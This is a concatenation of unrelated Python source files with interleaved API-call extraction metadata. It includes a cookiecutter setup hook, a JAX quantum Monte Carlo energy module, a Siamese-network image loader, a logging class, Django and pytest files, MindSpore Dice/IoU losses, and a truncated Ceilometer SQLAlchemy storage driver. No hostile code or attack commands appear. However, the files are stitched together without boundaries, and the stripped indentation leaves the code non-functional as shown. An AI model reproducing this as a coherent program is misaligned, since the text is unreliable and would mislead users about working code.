"❌ The environment could not be built, you can do it later "
"using the included command `make build-env`."
)
def create_virtual_environment():
subprocess.check_call(["python3", "-m", "venv", ".venv"])
def install_dependencies():
subprocess.check_call(
["poetry", "run", "pip", "install", "--upgrade", "pip"]
)
subprocess.check_call(["poetry", "run", "poetry", "install"])
# GIT INITIALIZATION
def execute_git_initialization():
print("⚒ Initializing git repository...")
try:
initialize_git_repository()
initial_git_commit()
rename_git_branch()
create_git_stable_branch()
print("✔ git initialization complete")
except subprocess.CalledProcessError:
print("❌ The git repository could not be correctly initialized.")
def initialize_git_repository():
subprocess.check_call(["git", "init"])
def initial_git_commit():
subprocess.check_call(["git", "add", "."])
subprocess.check_call(["git", "commit", "-m", "'Initial commit'"])
def rename_git_branch():
subprocess.check_call(["git", "branch", "-M", "{{ cookiecutter.git_main_branch }}"])
def create_git_stable_branch():
subprocess.check_call(["git", "branch", "stable"])
if __name__ == "__main__":
cleanup_disabled_features()
build_environment()
execute_git_initialization()
|
[
"os.remove",
"json.load",
"os.path.isdir",
"os.path.isfile",
"shutil.rmtree",
"subprocess.check_call"
] |
[((529, 553), 'os.path.isfile', 'os.path.isfile', (['resource'], {}), '(resource)\n', (543, 553), False, 'import os\n'), ((1100, 1157), 'subprocess.check_call', 'subprocess.check_call', (["['python3', '-m', 'venv', '.venv']"], {}), "(['python3', '-m', 'venv', '.venv'])\n", (1121, 1157), False, 'import subprocess\n'), ((1192, 1270), 'subprocess.check_call', 'subprocess.check_call', (["['poetry', 'run', 'pip', 'install', '--upgrade', 'pip']"], {}), "(['poetry', 'run', 'pip', 'install', '--upgrade', 'pip'])\n", (1213, 1270), False, 'import subprocess\n'), ((1289, 1350), 'subprocess.check_call', 'subprocess.check_call', (["['poetry', 'run', 'poetry', 'install']"], {}), "(['poetry', 'run', 'poetry', 'install'])\n", (1310, 1350), False, 'import subprocess\n'), ((1794, 1832), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'init']"], {}), "(['git', 'init'])\n", (1815, 1832), False, 'import subprocess\n'), ((1865, 1907), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'add', '.']"], {}), "(['git', 'add', '.'])\n", (1886, 1907), False, 'import subprocess\n'), ((1912, 1978), 'subprocess.check_call', 'subprocess.check_call', (['[\'git\', \'commit\', \'-m\', "\'Initial commit\'"]'], {}), '([\'git\', \'commit\', \'-m\', "\'Initial commit\'"])\n', (1933, 1978), False, 'import subprocess\n'), ((2010, 2098), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'branch', '-M', '{{ cookiecutter.git_main_branch }}']"], {}), "(['git', 'branch', '-M',\n '{{ cookiecutter.git_main_branch }}'])\n", (2031, 2098), False, 'import subprocess\n'), ((2133, 2183), 'subprocess.check_call', 'subprocess.check_call', (["['git', 'branch', 'stable']"], {}), "(['git', 'branch', 'stable'])\n", (2154, 2183), False, 'import subprocess\n'), ((229, 253), 'json.load', 'json.load', (['manifest_file'], {}), '(manifest_file)\n', (238, 253), False, 'import json\n'), ((563, 582), 'os.remove', 'os.remove', (['resource'], {}), '(resource)\n', (572, 582), False, 'import os\n'), 
((592, 615), 'os.path.isdir', 'os.path.isdir', (['resource'], {}), '(resource)\n', (605, 615), False, 'import os\n'), ((625, 648), 'shutil.rmtree', 'shutil.rmtree', (['resource'], {}), '(resource)\n', (638, 648), False, 'import shutil\n')]
|
#import numpy as np
import jax.numpy as jnp
import pyqmc.eval_ecp as eval_ecp
from pyqmc.distance import RawDistance
def ee_energy(configs):
ne = configs.shape[1]
if ne == 1:
return jnp.zeros(configs.shape[0])
ee = jnp.zeros(configs.shape[0])
ee, ij = RawDistance().dist_matrix(configs)
ee = jnp.linalg.norm(ee, axis=2)
return jnp.sum(1.0 / ee, axis=1)
def ei_energy(mol, configs):
ei = 0.0
for c, coord in zip(mol.atom_charges(), mol.atom_coords()):
delta = configs - coord[jnp.newaxis, jnp.newaxis, :]
deltar = jnp.sqrt(jnp.sum(delta ** 2, axis=2))
ei += -c * jnp.sum(1.0 / deltar, axis=1)
return ei
def ii_energy(mol):
ei = 0.0
d = RawDistance()
rij, ij = d.dist_matrix(mol.atom_coords()[jnp.newaxis, :, :])
if len(ij) == 0:
return jnp.array([0.0])
rij = jnp.linalg.norm(rij, axis=2)[0, :]
iitot = 0
c = mol.atom_charges()
for (i, j), r in zip(ij, rij):
iitot += c[i] * c[j] / r
return iitot
def get_ecp(mol, configs, wf, threshold):
return eval_ecp.ecp(mol, configs, wf, threshold)
def kinetic(configs, wf):
nconf, nelec, ndim = configs.shape
ke = jnp.zeros(nconf)
ke += -0.5 * jnp.real(wf["laplacian"](configs))
return ke
def energy(mol, configs, wf, threshold):
"""Compute the local energy of a set of configurations.
Args:
mol: A pyscf-like 'Mole' object. nelec, atom_charges(), atom_coords(), and ._ecp are used.
configs: a nconfiguration x nelectron x 3 numpy array
wf: A Wavefunction-like object. Functions used include recompute(), lapacian(), and testvalue()
Returns:
a dictionary with energy components ke, ee, ei, and total
"""
ee = ee_energy(configs)
ei = ei_energy(mol, configs)
ecp_val = get_ecp(mol, configs, wf, threshold)
ii = ii_energy(mol)
ke = kinetic(configs, wf)
# print(ke,ee,ei,ii)
return {
"ke": ke,
"ee": ee,
"ei": ei,
"ecp": ecp_val,
"total": ke + ee + ei + ecp_val + ii,
}
|
[
"jax.numpy.array",
"jax.numpy.sum",
"jax.numpy.linalg.norm",
"pyqmc.distance.RawDistance",
"jax.numpy.zeros",
"pyqmc.eval_ecp.ecp"
] |
[((237, 264), 'jax.numpy.zeros', 'jnp.zeros', (['configs.shape[0]'], {}), '(configs.shape[0])\n', (246, 264), True, 'import jax.numpy as jnp\n'), ((322, 349), 'jax.numpy.linalg.norm', 'jnp.linalg.norm', (['ee'], {'axis': '(2)'}), '(ee, axis=2)\n', (337, 349), True, 'import jax.numpy as jnp\n'), ((361, 386), 'jax.numpy.sum', 'jnp.sum', (['(1.0 / ee)'], {'axis': '(1)'}), '(1.0 / ee, axis=1)\n', (368, 386), True, 'import jax.numpy as jnp\n'), ((717, 730), 'pyqmc.distance.RawDistance', 'RawDistance', ([], {}), '()\n', (728, 730), False, 'from pyqmc.distance import RawDistance\n'), ((1076, 1117), 'pyqmc.eval_ecp.ecp', 'eval_ecp.ecp', (['mol', 'configs', 'wf', 'threshold'], {}), '(mol, configs, wf, threshold)\n', (1088, 1117), True, 'import pyqmc.eval_ecp as eval_ecp\n'), ((1194, 1210), 'jax.numpy.zeros', 'jnp.zeros', (['nconf'], {}), '(nconf)\n', (1203, 1210), True, 'import jax.numpy as jnp\n'), ((200, 227), 'jax.numpy.zeros', 'jnp.zeros', (['configs.shape[0]'], {}), '(configs.shape[0])\n', (209, 227), True, 'import jax.numpy as jnp\n'), ((833, 849), 'jax.numpy.array', 'jnp.array', (['[0.0]'], {}), '([0.0])\n', (842, 849), True, 'import jax.numpy as jnp\n'), ((860, 888), 'jax.numpy.linalg.norm', 'jnp.linalg.norm', (['rij'], {'axis': '(2)'}), '(rij, axis=2)\n', (875, 888), True, 'import jax.numpy as jnp\n'), ((278, 291), 'pyqmc.distance.RawDistance', 'RawDistance', ([], {}), '()\n', (289, 291), False, 'from pyqmc.distance import RawDistance\n'), ((582, 609), 'jax.numpy.sum', 'jnp.sum', (['(delta ** 2)'], {'axis': '(2)'}), '(delta ** 2, axis=2)\n', (589, 609), True, 'import jax.numpy as jnp\n'), ((630, 659), 'jax.numpy.sum', 'jnp.sum', (['(1.0 / deltar)'], {'axis': '(1)'}), '(1.0 / deltar, axis=1)\n', (637, 659), True, 'import jax.numpy as jnp\n')]
|
from app.models import DataSource, DataSourcePoll
def fetch_all_data_sources():
try:
all_data_sources = DataSource.query.all()
except Exception:
print("error fetching data sources; table likely empty")
all_data_sources = []
return all_data_sources
def fetch_all_data_source_polls():
try:
all_data_source_polls = DataSourcePoll.query.all()
except Exception:
print("error fetching data source polls; table likely empty")
all_data_source_polls = []
return all_data_source_polls
|
[
"app.models.DataSourcePoll.query.all",
"app.models.DataSource.query.all"
] |
[((118, 140), 'app.models.DataSource.query.all', 'DataSource.query.all', ([], {}), '()\n', (138, 140), False, 'from app.models import DataSource, DataSourcePoll\n'), ((364, 390), 'app.models.DataSourcePoll.query.all', 'DataSourcePoll.query.all', ([], {}), '()\n', (388, 390), False, 'from app.models import DataSource, DataSourcePoll\n')]
|
import os
import numpy as np
# from skimage.io import imread
import cv2
import copy
from skimage.transform import resize
def load_data_siamese(x_size, y_size, data_path, label_path, image_s_path,
                      uncentain_path, validation_name, test_name):
    """Build image pairs for training/evaluating a Siamese network.

    For every ``(ran, lr)`` entry in ``validation_name``/``test_name`` the
    first matching image becomes the "base" of every pair and each further
    matching image is paired with it; the pair label is 1 when both images
    carry the same ground-truth label, else 0.

    Args:
        x_size, y_size: target width/height each image is resized to.
        data_path: directory holding the ``<ran>-<tracking>.jpg`` images.
        label_path: CSV with columns ran, lr, tracking, label (header row).
        image_s_path: CSV listing images whose name ends in ``-s``.
        uncentain_path: CSV listing images with an uncertain label.
        validation_name: sequence of (ran, lr) pairs for validation.
        test_name: sequence of (ran, lr) pairs for testing.

    Returns:
        ``(val_images, val_labels, test_images, test_labels, ind_start)``
        where ``val_images``/``test_images`` are ``[base_array, pair_array]``
        lists and ``ind_start`` holds, per test subject, the running image
        index of its base image.
    """
    # dtype=str replaces the deprecated np.str alias (removed in
    # NumPy >= 1.24), which made this function crash on modern NumPy.
    tmp = np.loadtxt(label_path, dtype=str, delimiter=",")
    # Drop one record whose jpg file is missing; 8252 is its data position
    # and +1 accounts for the header row.
    tmp = np.delete(tmp, 8252 + 1, axis=0)
    # Strip the header row from every column.
    ran = tmp[:, 0][1:]
    lr = tmp[:, 1][1:]
    tracking = tmp[:, 2][1:]
    tmp1 = tmp[:, 3][1:]
    # ran/tracking numbers for images whose name ends in "-s".
    # NOTE(review): parsed but not used below -- kept so a missing file
    # still raises early; confirm whether these CSVs are still needed.
    tmp_s = np.loadtxt(image_s_path, dtype=str, delimiter=",")
    ran_s = tmp_s[:, 1][1:]
    tracking_s = tmp_s[:, 2][1:]
    # ran/tracking numbers for images with an uncertain label (also unused).
    tmp_un = np.loadtxt(uncentain_path, dtype=str, delimiter=",")
    ran_un = tmp_un[:, 0][1:]
    tracking_un = tmp_un[:, 1][1:]
    # ---- validation pairs -------------------------------------------------
    # Pre-allocate generously (up to 20 pairs per subject), trim afterwards.
    val_images1 = np.ndarray((len(validation_name) * 20, x_size, y_size, 3))
    val_images2 = np.ndarray((len(validation_name) * 20, x_size, y_size, 3))
    val_labels = []
    le = 0
    for i in range(len(validation_name)):
        ind = np.argwhere(ran == validation_name[i][0])
        kk = 0
        for j in range(len(ind)):
            if lr[int(ind[j])] == validation_name[i][1]:
                data_paths = os.path.join(
                    data_path,
                    ran[int(ind[j])] + '-' + tracking[int(ind[j])] + '.jpg')
                IM = cv2.imread(data_paths)
                if kk == 0:
                    # First matching image is the base of every pair.
                    val_images_base = cv2.resize(IM, (x_size, y_size))
                    gt = tmp1[int(ind[j])]
                    kk = 1
                else:
                    val_images1[le] = val_images_base
                    val_images2[le] = cv2.resize(IM, (x_size, y_size))
                    le += 1
                    # Pair label: 1 when both images share the base label.
                    if gt == tmp1[int(ind[j])]:
                        val_labels = np.append(val_labels, 1)
                    else:
                        val_labels = np.append(val_labels, 0)
    val_images1 = val_images1[0:le, :, :, :]
    val_images2 = val_images2[0:le, :, :, :]
    val_images = [val_images1, val_images2]
    # ---- test pairs -------------------------------------------------------
    test_images1 = np.ndarray((len(test_name) * 20, x_size, y_size, 3))
    test_images2 = np.ndarray((len(test_name) * 20, x_size, y_size, 3))
    test_labels = []
    le = 0
    ind_start = []
    ll_index = 0
    for i in range(len(test_name)):
        ind = np.argwhere(ran == test_name[i][0])
        kk = 0
        for j in range(len(ind)):
            if lr[int(ind[j])] == test_name[i][1]:
                data_paths = os.path.join(
                    data_path,
                    ran[int(ind[j])] + '-' + tracking[int(ind[j])] + '.jpg')
                IM = cv2.imread(data_paths)
                if kk == 0:
                    test_images_base = cv2.resize(IM, (x_size, y_size))
                    gt = tmp1[int(ind[j])]
                    kk = 1
                    # Remember the running image index of this base image.
                    ind_start = np.append(ind_start, ll_index)
                else:
                    test_images1[le] = test_images_base
                    test_images2[le] = cv2.resize(IM, (x_size, y_size))
                    le += 1
                    if gt == tmp1[int(ind[j])]:
                        test_labels = np.append(test_labels, 1)
                    else:
                        test_labels = np.append(test_labels, 0)
                # Counts every matched image (base and paired alike).
                ll_index += 1
    test_images1 = test_images1[0:le, :, :, :]
    test_images2 = test_images2[0:le, :, :, :]
    test_images = [test_images1, test_images2]
    return val_images, val_labels, test_images, test_labels, ind_start
|
[
"cv2.imread",
"numpy.append",
"numpy.loadtxt",
"numpy.argwhere",
"numpy.delete",
"cv2.resize"
] |
[((245, 296), 'numpy.loadtxt', 'np.loadtxt', (['label_path'], {'dtype': 'np.str', 'delimiter': '""","""'}), "(label_path, dtype=np.str, delimiter=',')\n", (255, 296), True, 'import numpy as np\n'), ((431, 463), 'numpy.delete', 'np.delete', (['tmp', '(8252 + 1)'], {'axis': '(0)'}), '(tmp, 8252 + 1, axis=0)\n', (440, 463), True, 'import numpy as np\n'), ((739, 792), 'numpy.loadtxt', 'np.loadtxt', (['image_s_path'], {'dtype': 'np.str', 'delimiter': '""","""'}), "(image_s_path, dtype=np.str, delimiter=',')\n", (749, 792), True, 'import numpy as np\n'), ((1010, 1065), 'numpy.loadtxt', 'np.loadtxt', (['uncentain_path'], {'dtype': 'np.str', 'delimiter': '""","""'}), "(uncentain_path, dtype=np.str, delimiter=',')\n", (1020, 1065), True, 'import numpy as np\n'), ((1533, 1574), 'numpy.argwhere', 'np.argwhere', (['(ran == validation_name[i][0])'], {}), '(ran == validation_name[i][0])\n', (1544, 1574), True, 'import numpy as np\n'), ((2990, 3025), 'numpy.argwhere', 'np.argwhere', (['(ran == test_name[i][0])'], {}), '(ran == test_name[i][0])\n', (3001, 3025), True, 'import numpy as np\n'), ((1811, 1833), 'cv2.imread', 'cv2.imread', (['data_paths'], {}), '(data_paths)\n', (1821, 1833), False, 'import cv2\n'), ((3256, 3278), 'cv2.imread', 'cv2.imread', (['data_paths'], {}), '(data_paths)\n', (3266, 3278), False, 'import cv2\n'), ((1900, 1932), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (1910, 1932), False, 'import cv2\n'), ((2116, 2148), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (2126, 2148), False, 'import cv2\n'), ((3345, 3377), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, (x_size, y_size))\n', (3355, 3377), False, 'import cv2\n'), ((3480, 3510), 'numpy.append', 'np.append', (['ind_start', 'll_index'], {}), '(ind_start, ll_index)\n', (3489, 3510), True, 'import numpy as np\n'), ((3627, 3659), 'cv2.resize', 'cv2.resize', (['IM', '(x_size, y_size)'], {}), '(IM, 
(x_size, y_size))\n', (3637, 3659), False, 'import cv2\n'), ((2262, 2286), 'numpy.append', 'np.append', (['val_labels', '(1)'], {}), '(val_labels, 1)\n', (2271, 2286), True, 'import numpy as np\n'), ((2349, 2373), 'numpy.append', 'np.append', (['val_labels', '(0)'], {}), '(val_labels, 0)\n', (2358, 2373), True, 'import numpy as np\n'), ((3774, 3799), 'numpy.append', 'np.append', (['test_labels', '(1)'], {}), '(test_labels, 1)\n', (3783, 3799), True, 'import numpy as np\n'), ((3863, 3888), 'numpy.append', 'np.append', (['test_labels', '(0)'], {}), '(test_labels, 0)\n', (3872, 3888), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Simple logging class
Released under the MIT license
Copyright (c) 2012, <NAME>
@category misc
@version $Id: 1.7.0, 2016-08-22 14:53:29 ACST $;
@author <NAME>
@license http://opensource.org/licenses/MIT
"""
import logging
import os
import sys
class Logger(object):
    """Thin wrapper around :mod:`logging` that always logs to
    ``autorippr.log`` and, unless ``silent`` is set, also to stdout.

    :param name:   logger name passed to ``logging.getLogger``.
    :param debug:  when true, log at DEBUG level instead of INFO.
    :param silent: when true, skip the stdout stream handler.
    """

    def __init__(self, name, debug, silent):
        self.silent = silent
        frmt = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s',
            "%Y-%m-%d %H:%M:%S"
        )
        loglevel = logging.DEBUG if debug else logging.INFO
        self.createhandlers(frmt, name, loglevel)

    def __del__(self):
        # Detach our handlers so repeatedly constructing Logger with the
        # same name does not stack duplicate handlers on the shared
        # logging.Logger instance.  getattr-guard in case __init__ failed.
        if getattr(self, 'log', None) is not None:
            if not self.silent:
                self.log.removeHandler(self.sh)
            # BUG FIX: the file handler exists in silent mode too, but was
            # previously only removed when not silent (handler leak).
            self.log.removeHandler(self.fh)
            self.fh.close()
        self.log = None

    def createhandlers(self, frmt, name, loglevel):
        """Attach a stdout handler (unless silent) and a file handler."""
        self.log = logging.getLogger(name)
        self.log.setLevel(loglevel)
        if not self.silent:
            self.sh = logging.StreamHandler(sys.stdout)
            self.sh.setLevel(loglevel)
            self.sh.setFormatter(frmt)
            self.log.addHandler(self.sh)
        # The log file lives two directories above this module.
        DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
        self.fh = logging.FileHandler('%s/autorippr.log' % DIR)
        self.fh.setLevel(loglevel)
        self.fh.setFormatter(frmt)
        self.log.addHandler(self.fh)

    def debug(self, msg):
        self.log.debug(msg)

    def info(self, msg):
        self.log.info(msg)

    def warn(self, msg):
        # Logger.warn() is deprecated in the stdlib; delegate to warning().
        self.log.warning(msg)

    def error(self, msg):
        self.log.error(msg)

    def critical(self, msg):
        self.log.critical(msg)
|
[
"os.path.abspath",
"logging.FileHandler",
"logging.StreamHandler",
"logging.Formatter",
"logging.getLogger"
] |
[((401, 499), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""', '"""%Y-%m-%d %H:%M:%S"""'], {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n '%Y-%m-%d %H:%M:%S')\n", (418, 499), False, 'import logging\n'), ((919, 942), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (936, 942), False, 'import logging\n'), ((1276, 1321), 'logging.FileHandler', 'logging.FileHandler', (["('%s/autorippr.log' % DIR)"], {}), "('%s/autorippr.log' % DIR)\n", (1295, 1321), False, 'import logging\n'), ((1030, 1063), 'logging.StreamHandler', 'logging.StreamHandler', (['sys.stdout'], {}), '(sys.stdout)\n', (1051, 1063), False, 'import logging\n'), ((1230, 1255), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (1245, 1255), False, 'import os\n')]
|
import os
import signal
import sys
import traceback
import time
from django.core.wsgi import get_wsgi_application
#from whitenoise.django import DjangoWhiteNoise
# Point Django at the project's settings module before creating the app.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "RiverFlows.settings")
# WSGI callable that application servers (gunicorn, uWSGI, mod_wsgi) import.
application = get_wsgi_application()
#application = DjangoWhiteNoise(application)
|
[
"django.core.wsgi.get_wsgi_application",
"os.environ.setdefault"
] |
[((164, 234), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""RiverFlows.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'RiverFlows.settings')\n", (185, 234), False, 'import os\n'), ((250, 272), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ([], {}), '()\n', (270, 272), False, 'from django.core.wsgi import get_wsgi_application\n')]
|
import pytest
import subprocess
from tests.utils import ingest_file_via_rest
from tests.utils import delete_urns_from_file
@pytest.fixture(scope="module", autouse=True)
def ingest_cleanup_data():
    """Module-scoped, auto-used fixture: load the Cypress test data before
    the module's tests run and delete it again afterwards."""
    print("ingesting test data")
    ingest_file_via_rest("tests/cypress/data.json")
    yield
    print("removing test data")
    delete_urns_from_file("tests/cypress/data.json")
def test_run_cypress(frontend_session, wait_for_healthchecks):
    """Run the Cypress end-to-end suite and fail if it exits non-zero.

    The two fixture arguments are only dependencies (session setup and
    service health) -- their values are not used here.
    """
    command = "npx cypress run"
    print('starting?')
    proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, cwd="tests/cypress")
    # communicate() drains both pipes concurrently and waits for exit;
    # sequential .read() calls on stdout then stderr can deadlock once
    # either OS pipe buffer fills up (see subprocess docs).
    stdout, stderr = proc.communicate()
    return_code = proc.returncode
    print(stdout.decode("utf-8"))
    print('stderr output:')
    print(stderr.decode("utf-8"))
    print('return code', return_code)
    assert return_code == 0
|
[
"tests.utils.ingest_file_via_rest",
"pytest.fixture",
"subprocess.Popen",
"tests.utils.delete_urns_from_file"
] |
[((127, 171), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""', 'autouse': '(True)'}), "(scope='module', autouse=True)\n", (141, 171), False, 'import pytest\n'), ((236, 283), 'tests.utils.ingest_file_via_rest', 'ingest_file_via_rest', (['"""tests/cypress/data.json"""'], {}), "('tests/cypress/data.json')\n", (256, 283), False, 'from tests.utils import ingest_file_via_rest\n'), ((330, 378), 'tests.utils.delete_urns_from_file', 'delete_urns_from_file', (['"""tests/cypress/data.json"""'], {}), "('tests/cypress/data.json')\n", (351, 378), False, 'from tests.utils import delete_urns_from_file\n'), ((511, 622), 'subprocess.Popen', 'subprocess.Popen', (['command'], {'shell': '(True)', 'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'cwd': '"""tests/cypress"""'}), "(command, shell=True, stdout=subprocess.PIPE, stderr=\n subprocess.PIPE, cwd='tests/cypress')\n", (527, 622), False, 'import subprocess\n')]
|
from os.path import dirname, join
import glob
from pathlib import Path
# Discover every .py file under this package, recursively.
_glob_pattern = join(dirname(__file__), '**/*.py')
modules = glob.glob(_glob_pattern, recursive=True)
paths = [Path(module_path) for module_path in modules]

def _is_exported(p):
    # A module is exported unless it is private (leading underscore) or
    # lives in the examples directory.
    return p.is_file() and not p.name.startswith('_') and p.parent.name != 'examples'

# Export modules as "<package>.<module>" names.
__all__ = [f'{p.parent.name}.{p.stem}' for p in paths if _is_exported(p)]
|
[
"pathlib.Path",
"os.path.dirname"
] |
[((240, 247), 'pathlib.Path', 'Path', (['x'], {}), '(x)\n', (244, 247), False, 'from pathlib import Path\n'), ((97, 114), 'os.path.dirname', 'dirname', (['__file__'], {}), '(__file__)\n', (104, 114), False, 'from os.path import dirname, join\n')]
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import mindspore
import mindspore.nn as nn
class dice_bce_loss(nn.LossBase):
    """Binary cross-entropy combined with a soft-Dice term.

    ``construct`` returns ``BCE(predict, target) + (1 - dice(target, predict))``.
    """
    def __init__(self, batch=True, reduction="mean"):
        super(dice_bce_loss, self).__init__(reduction)
        self.batch = batch
        self.bce_loss = nn.BCELoss(reduction='mean')
        self.sum = mindspore.ops.ReduceSum(keep_dims=False)
    def soft_dice_coeff(self, y_true, y_pred):
        """Mean soft Dice coefficient between ``y_true`` and ``y_pred``."""
        smooth = 0.0  # may change
        if self.batch:
            # Reduce over every dimension at once.
            area_true = self.sum(y_true)
            area_pred = self.sum(y_pred)
            overlap = self.sum(y_true * y_pred)
        else:
            # Reduce per sample over the three trailing dimensions.
            area_true = y_true.sum(1).sum(1).sum(1)
            area_pred = y_pred.sum(1).sum(1).sum(1)
            overlap = (y_true * y_pred).sum(1).sum(1).sum(1)
        score = (2. * overlap + smooth) / (area_true + area_pred + smooth)
        return score.mean()
    def soft_dice_loss(self, y_true, y_pred):
        """Dice loss: one minus the soft Dice coefficient."""
        return 1 - self.soft_dice_coeff(y_true, y_pred)
    def construct(self, predict, target):
        bce = self.bce_loss(predict, target)
        dice = self.soft_dice_loss(target, predict)
        return bce + dice
class iou_bce_loss(nn.LossBase):
    """Binary cross-entropy combined with a soft-IoU term.

    ``construct`` returns ``BCE(predict, target) + (1 - iou(target, predict))``.
    """
    def __init__(self, batch=True, reduction="mean"):
        super(iou_bce_loss, self).__init__(reduction)
        self.batch = batch
        self.bce_loss = nn.BCELoss(reduction='mean')
        self.sum = mindspore.ops.ReduceSum(keep_dims=False)
    def soft_dice_coeff(self, y_true, y_pred):
        # NOTE(review): despite the name this computes the IoU (Jaccard)
        # coefficient, not the Dice coefficient -- see the score formula.
        smooth = 0.0  # may change
        if self.batch:
            # Reduce over every dimension at once.
            i = self.sum(y_true)
            j = self.sum(y_pred)
            intersection = self.sum(y_true * y_pred)
        else:
            # Reduce per sample over the three trailing dimensions.
            i = y_true.sum(1).sum(1).sum(1)
            j = y_pred.sum(1).sum(1).sum(1)
            intersection = (y_true * y_pred).sum(1).sum(1).sum(1)
        score = (intersection + smooth) / (i + j - intersection + smooth)  # iou
        return score.mean()
    def soft_dice_loss(self, y_true, y_pred):
        # One minus the (IoU) coefficient above.
        loss = 1 - self.soft_dice_coeff(y_true, y_pred)
        return loss
    def construct(self, predict, target):
        # Total loss = BCE + IoU loss.
        a = self.bce_loss(predict, target)
        b = self.soft_dice_loss(target, predict)
        return a + b
|
[
"mindspore.ops.ReduceSum",
"mindspore.nn.BCELoss"
] |
[((907, 935), 'mindspore.nn.BCELoss', 'nn.BCELoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (917, 935), True, 'import mindspore.nn as nn\n'), ((955, 995), 'mindspore.ops.ReduceSum', 'mindspore.ops.ReduceSum', ([], {'keep_dims': '(False)'}), '(keep_dims=False)\n', (978, 995), False, 'import mindspore\n'), ((1954, 1982), 'mindspore.nn.BCELoss', 'nn.BCELoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (1964, 1982), True, 'import mindspore.nn as nn\n'), ((2002, 2042), 'mindspore.ops.ReduceSum', 'mindspore.ops.ReduceSum', ([], {'keep_dims': '(False)'}), '(keep_dims=False)\n', (2025, 2042), False, 'import mindspore\n')]
|
# -*- encoding: utf-8 -*-
#
# Author: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""SQLAlchemy storage backend."""
from __future__ import absolute_import
import copy
import os
from sqlalchemy import func
from ceilometer.openstack.common import log
from ceilometer.openstack.common import timeutils
from ceilometer.storage import base
from ceilometer.storage import models as api_models
from ceilometer.storage.sqlalchemy import migration
from ceilometer.storage.sqlalchemy.models import Meter, Project, Resource
from ceilometer.storage.sqlalchemy.models import Source, User, Base
import ceilometer.storage.sqlalchemy.session as sqlalchemy_session
# Module-level logger for this storage driver.
LOG = log.getLogger(__name__)
class SQLAlchemyStorage(base.StorageEngine):
    """Put the data into a SQLAlchemy database.

    Tables::

        - user
          - { id: user uuid }
        - source
          - { id: source id }
        - project
          - { id: project uuid }
        - meter
          - the raw incoming data
          - { id: meter id
              counter_name: counter name
              user_id: user uuid            (->user.id)
              project_id: project uuid      (->project.id)
              resource_id: resource uuid    (->resource.id)
              resource_metadata: metadata dictionaries
              counter_type: counter type
              counter_unit: counter unit
              counter_volume: counter volume
              timestamp: datetime
              message_signature: message signature
              message_id: message uuid
              }
        - resource
          - the metadata for resources
          - { id: resource uuid
              resource_metadata: metadata dictionaries
              project_id: project uuid      (->project.id)
              user_id: user uuid            (->user.id)
              }
        - sourceassoc
          - the relationships
          - { meter_id: meter id            (->meter.id)
              project_id: project uuid      (->project.id)
              resource_id: resource uuid    (->resource.id)
              user_id: user uuid            (->user.id)
              source_id: source id          (->source.id)
              }
    """
    # This driver defines no extra configuration options (yet).
    OPTIONS = []
    def register_opts(self, conf):
        """Register any configuration options used by this engine."""
        conf.register_opts(self.OPTIONS)
    @staticmethod
    def get_connection(conf):
        """Return a Connection instance based on the configuration settings.
        """
        return Connection(conf)
def make_query_from_filter(query, event_filter, require_meter=True):
    """Narrow *query* down with the constraints held by *event_filter*.

    :param query: the SQLAlchemy query to add filters to.
    :param event_filter: EventFilter instance.
    :param require_meter: If true and the filter does not have a meter,
                          raise an error.
    """
    if event_filter.meter:
        query = query.filter(Meter.counter_name == event_filter.meter)
    elif require_meter:
        raise RuntimeError('Missing required meter specifier')
    if event_filter.source:
        query = query.filter(Meter.sources.any(id=event_filter.source))
    # Timestamp range: start is inclusive, end is exclusive.
    if event_filter.start:
        query = query.filter(Meter.timestamp >= event_filter.start)
    if event_filter.end:
        query = query.filter(Meter.timestamp < event_filter.end)
    # The remaining constraints are plain column equalities.
    for attr in ('user', 'project', 'resource'):
        value = getattr(event_filter, attr)
        if value:
            query = query.filter_by(**{attr + '_id': value})
    if event_filter.metaquery:
        raise NotImplementedError('metaquery not implemented')
    return query
class Connection(base.Connection):
    """SqlAlchemy connection: implements the storage API on top of the
    tables described in SQLAlchemyStorage."""
    def __init__(self, conf):
        url = conf.database_connection
        if url == 'sqlite://':
            # Allow tests to redirect the in-memory sqlite URL.
            url = os.environ.get('CEILOMETER_TEST_SQL_URL', url)
        LOG.info('connecting to %s', url)
